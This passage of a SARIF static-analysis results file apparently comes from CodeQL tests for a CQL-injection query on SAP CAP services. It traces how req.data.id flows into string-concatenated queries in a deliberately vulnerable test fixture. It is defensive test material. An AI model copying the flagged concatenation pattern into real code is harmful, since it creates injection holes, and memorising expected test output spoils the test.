value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":328,"startColumn":7,"endColumn":59}}}],"partialFingerprints":{"primaryLocationLineHash":"53b68a547e06f5f5:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":328,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":328,"startColumn":47,"endColumn":58}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":328,"startColumn":47,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":336,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"ef4fafb0cb633d3e:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":335,"startColumn":72,"endColumn":74}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":335,"startColumn":28,"endColumn":74}},"message":{"text":"\"SELECT ... =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":335,"startColumn":21,"endColumn":75}},"message":{"text":"cds.ql( ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":335,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":336,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":343,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"70bf4adf3ece4680:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":342,"startColumn":72,"endColumn":74}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":342,"startColumn":28,"endColumn":74}},"message":{"text":"`SELECT ... =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":342,"startColumn":21,"endColumn":75}},"message":{"text":"cds.ql( ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":342,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":343,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":350,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"b17718767883cb21:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":349,"startColumn":71,"endColumn":73}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":349,"startColumn":28,"endColumn":75}},"message":{"text":"`SELECT ...  ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":349,"startColumn":21,"endColumn":76}},"message":{"text":"cds.ql( ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":349,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":350,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":364,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"a684f52297f0c4e5:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":363,"startColumn":72,"endColumn":74}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":363,"startColumn":35,"endColumn":74}},"message":{"text":"\"SELECT ... =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":363,"startColumn":21,"endColumn":75}},"message":{"text":"cds.par ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":363,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":364,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":370,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"d550e0002cd278da:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":369,"startColumn":72,"endColumn":74}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":369,"startColumn":35,"endColumn":74}},"message":{"text":"`SELECT ... =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":369,"startColumn":21,"endColumn":75}},"message":{"text":"cds.par ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":369,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":370,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":376,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"6a27aa8587353580:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":375,"startColumn":71,"endColumn":73}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":375,"startColumn":35,"endColumn":75}},"message":{"text":"`SELECT ...  ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":375,"startColumn":21,"endColumn":76}},"message":{"text":"cds.par ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":375,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":376,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":389,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"69fde7291c8fc74e:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":388,"startColumn":62,"endColumn":64}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":388,"startColumn":25,"endColumn":64}},"message":{"text":"\"SELECT ... =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":388,"startColumn":21,"endColumn":65}},"message":{"text":"CQL(\"SE ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":388,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":389,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":395,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"98c9d206b1717b43:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":394,"startColumn":62,"endColumn":64}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":394,"startColumn":25,"endColumn":64}},"message":{"text":"`SELECT ... =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":394,"startColumn":21,"endColumn":65}},"message":{"text":"CQL(`SE ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":394,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":395,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":401,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"d013e7d9793c061d:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":400,"startColumn":61,"endColumn":63}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":400,"startColumn":25,"endColumn":65}},"message":{"text":"`SELECT ...  ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":400,"startColumn":21,"endColumn":66}},"message":{"text":"CQL(`SE ... 